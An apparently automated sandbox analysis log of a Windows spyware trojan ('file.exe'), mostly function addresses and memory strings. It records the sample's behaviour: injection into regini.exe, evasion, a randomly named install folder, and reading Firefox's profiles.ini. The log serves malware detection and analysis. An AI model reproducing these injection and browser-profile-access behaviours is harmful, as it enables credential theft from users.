                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024296E0 NtClose,7_2_024296E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02429550 NtReadFile,7_2_02429550
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02429850 NtAllocateVirtualMemory,7_2_02429850
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F0E6 NtReadVirtualMemory,7_2_02E6F0E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F149 NtReadVirtualMemory,7_2_02E6F149
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6F795 NtClose,7_2_02E6F795
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0266D51C1_2_0266D51C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BAA9E81_2_06BAA9E8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BA65E81_2_06BA65E8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BA52E81_2_06BA52E8
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BA73D01_2_06BA73D0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BA4EB01_2_06BA4EB0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_06BA6EC01_2_06BA6EC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004188E34_2_004188E3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004101034_2_00410103
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402A724_2_00402A72
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416ADE4_2_00416ADE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00416AE34_2_00416AE3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402A804_2_00402A80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E3034_2_0040E303
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004103234_2_00410323
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E4474_2_0040E447
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040E4534_2_0040E453
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0040256A4_2_0040256A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_004025704_2_00402570
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0042EED34_2_0042EED3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00402F504_2_00402F50
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018701AA4_2_018701AA
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018681CC4_2_018681CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A01004_2_017A0100
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184A1184_2_0184A118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018381584_2_01838158
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018420004_2_01842000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018703E64_2_018703E6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE3F04_2_017BE3F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186A3524_2_0186A352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018302C04_2_018302C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018502744_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018705914_2_01870591
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B05354_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185E4F64_2_0185E4F6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018544204_2_01854420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018624464_2_01862446
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B07704_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D47504_2_017D4750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AC7C04_2_017AC7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CC6E04_2_017CC6E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C69624_2_017C6962
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0187A9A64_2_0187A9A6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B29A04_2_017B29A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA8404_2_017BA840
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE8F04_2_017DE8F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017968B84_2_017968B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01866BD74_2_01866BD7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AEA804_2_017AEA80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BAD004_2_017BAD00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AADE04_2_017AADE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184CD1F4_2_0184CD1F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C8DBF4_2_017C8DBF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850CB54_2_01850CB5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0C004_2_017B0C00
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0CF24_2_017A0CF2
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182EFA04_2_0182EFA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0F304_2_017D0F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F2F284_2_017F2F28
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BCFE04_2_017BCFE0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2FC84_2_017A2FC8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01852F304_2_01852F30
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01824F404_2_01824F40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186CE934_2_0186CE93
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0E594_2_017B0E59
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186EEDB4_2_0186EEDB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186EE264_2_0186EE26
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C2E904_2_017C2E90
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179F1724_2_0179F172
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E516C4_2_017E516C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BB1B04_2_017BB1B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0187B16B4_2_0187B16B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185F0CC4_2_0185F0CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186F0E04_2_0186F0E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018670E94_2_018670E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B70C04_2_017B70C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179D34C4_2_0179D34C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186132D4_2_0186132D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F739A4_2_017F739A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018512ED4_2_018512ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CB2C04_2_017CB2C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B52A04_2_017B52A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184D5B04_2_0184D5B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018675714_2_01867571
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A14604_2_017A1460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186F43F4_2_0186F43F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186F7B04_2_0186F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A17EC4_2_017A17EC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018616CC4_2_018616CC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B99504_2_017B9950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CB9504_2_017CB950
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018459104_2_01845910
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181D8004_2_0181D800
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B38E04_2_017B38E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01825BF04_2_01825BF0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017EDBF94_2_017EDBF9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186FB764_2_0186FB76
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CFB804_2_017CFB80
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01851AA34_2_01851AA3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184DAAC4_2_0184DAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185DAC64_2_0185DAC6
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01867A464_2_01867A46
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186FA494_2_0186FA49
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017F5AA04_2_017F5AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01823A6C4_2_01823A6C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B3D404_2_017B3D40
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CFDC04_2_017CFDC0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01861D5A4_2_01861D5A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01867D734_2_01867D73
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01829C324_2_01829C32
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186FFB14_2_0186FFB1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186FF094_2_0186FF09
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B1F924_2_017B1F92
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B9EB04_2_017B9EB0
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EA75D5_2_034EA75D
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_0350B37A5_2_0350B37A
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EA8EE5_2_034EA8EE
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EA8FA5_2_034EA8FA
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EC7CA5_2_034EC7CA
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F2F8A5_2_034F2F8A
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F2F855_2_034F2F85
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EA7AA5_2_034EA7AA
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034F4D8A5_2_034F4D8A
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exeCode function: 5_2_034EC5AA5_2_034EC5AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BD02C07_2_02BD02C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF02747_2_02BF0274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C103E67_2_02C103E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B5E3F07_2_02B5E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0A3527_2_02C0A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BE20007_2_02BE2000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C081CC7_2_02C081CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C101AA7_2_02C101AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BEA1187_2_02BEA118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B401007_2_02B40100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BD81587_2_02BD8158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B6C6E07_2_02B6C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B4C7C07_2_02B4C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B507707_2_02B50770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B747507_2_02B74750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BFE4F67_2_02BFE4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C024467_2_02C02446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF44207_2_02BF4420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C105917_2_02C10591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B505357_2_02B50535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B4EA807_2_02B4EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C06BD77_2_02C06BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0AB407_2_02C0AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B368B87_2_02B368B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B7E8F07_2_02B7E8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B5A8407_2_02B5A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B528407_2_02B52840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B529A07_2_02B529A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C1A9A67_2_02C1A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B669627_2_02B66962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0EEDB7_2_02C0EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B62E907_2_02B62E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0CE937_2_02C0CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0EE267_2_02C0EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B50E597_2_02B50E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BCEFA07_2_02BCEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B5CFE07_2_02B5CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B42FC87_2_02B42FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B70F307_2_02B70F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF2F307_2_02BF2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B92F287_2_02B92F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BC4F407_2_02BC4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF0CB57_2_02BF0CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B40CF27_2_02B40CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B50C007_2_02B50C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B68DBF7_2_02B68DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B4ADE07_2_02B4ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BECD1F7_2_02BECD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B5AD007_2_02B5AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B552A07_2_02B552A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF12ED7_2_02BF12ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B6B2C07_2_02B6B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B9739A7_2_02B9739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0132D7_2_02C0132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B3D34C7_2_02B3D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0F0E07_2_02C0F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C070E97_2_02C070E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BFF0CC7_2_02BFF0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B570C07_2_02B570C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B5B1B07_2_02B5B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C1B16B7_2_02C1B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B3F1727_2_02B3F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B8516C7_2_02B8516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C016CC7_2_02C016CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B417EC7_2_02B417EC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0F7B07_2_02C0F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B414607_2_02B41460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0F43F7_2_02C0F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BED5B07_2_02BED5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C075717_2_02C07571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BEDAAC7_2_02BEDAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B95AA07_2_02B95AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BF1AA37_2_02BF1AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BFDAC67_2_02BFDAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C07A467_2_02C07A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0FA497_2_02C0FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BC3A6C7_2_02BC3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B6FB807_2_02B6FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B8DBF97_2_02B8DBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BC5BF07_2_02BC5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0FB767_2_02C0FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B538E07_2_02B538E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BBD8007_2_02BBD800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BE59107_2_02BE5910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B599507_2_02B59950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B6B9507_2_02B6B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B59EB07_2_02B59EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B51F927_2_02B51F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0FFB17_2_02C0FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0FF097_2_02C0FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C0FCF27_2_02C0FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02BC9C327_2_02BC9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B6FDC07_2_02B6FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C01D5A7_2_02C01D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02C07D737_2_02C07D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02B53D407_2_02B53D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024120407_2_02412040
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0240CF107_2_0240CF10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0240B2547_2_0240B254
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0240B2607_2_0240B260
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0240B1107_2_0240B110
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0240D1307_2_0240D130
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024156F07_2_024156F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024138EB7_2_024138EB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_024138F07_2_024138F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_0242BCE07_2_0242BCE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6E2777_2_02E6E277
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6D6D87_2_02E6D6D8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 7_2_02E6E60C7_2_02E6E60C
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02B3B970 appears 283 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02B97E54 appears 100 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02B85130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02BCF290 appears 105 times
                Source: C:\Windows\SysWOW64\regini.exeCode function: String function: 02BBEA12 appears 86 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0179B970 appears 283 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 017E5130 appears 58 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0182F290 appears 105 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 017F7E54 appears 100 times
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0181EA12 appears 86 times
                Source: file.exe, 00000001.00000002.1303927449.0000000002743000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
                Source: file.exe, 00000001.00000002.1302022571.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameBQCU.exe4 vs file.exe
                Source: file.exe, 00000001.00000002.1307923137.0000000004EA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
                Source: file.exe, 00000001.00000002.1309009294.0000000007400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
                Source: file.exe, 00000004.00000002.1501327287.00000000011E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREGINI.EXEj% vs file.exe
                Source: file.exe, 00000004.00000002.1501644059.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs file.exe
                Source: file.exeBinary or memory string: OriginalFilenameBQCU.exe4 vs file.exe
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, bRKVLAxVgLuKVK4XDc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, bRKVLAxVgLuKVK4XDc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, bRKVLAxVgLuKVK4XDc.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.file.exe.7400000.4.raw.unpack, bRKVLAxVgLuKVK4XDc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.7400000.4.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.file.exe.39b31a0.0.raw.unpack, iHVIqRWtieGe6IZObc.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@13/13
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exeFile created: C:\Users\user\AppData\Local\Temp\7046-nn1KJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                Source: file.exe, 00000001.00000000.1280172327.0000000000242000.00000002.00000001.01000000.00000004.sdmp, regini.exe, 00000007.00000002.3756768985.000000000322C000.00000004.10000000.00040000.00000000.sdmp, regini.exe, 00000007.00000002.3755068155.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.1801910689.000000002B8AC000.00000004.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
